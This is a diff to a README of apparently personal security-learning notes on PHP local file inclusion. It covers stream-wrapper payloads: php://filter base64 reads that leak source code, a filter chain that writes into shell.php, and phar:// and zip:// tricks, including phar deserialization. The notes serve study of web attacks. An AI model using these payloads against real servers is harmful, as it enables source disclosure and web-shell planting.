shinmao/SecurityLearning/LFI/README.md

 POST data: xxx

 php://filter
-// get source code ?file=php://filter/read=convert.base64-encode/resource=file.php
+// get base-64 encoded source code
+?file=php://filter/read=convert.base64-encode/resource=file.php
-// filter can be used on handling string, take a look at the reference#1 php://filter/read=string.strip_tags/resource=php://input
+// It's important that filter can be used to handle string with various ways, please take a look at the reference#1 php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php

 phar://path.zip/file.php
 // php5.3.0up, parse the archived file
+// Sam Thomas publish a new use of phar able to unserialize without unserialize() function, please take a look at my Unserialization part

 zip://path.zip%23file.php
 // php5.3.0up, work as phar://, but need absolute path, and need to encode # as %23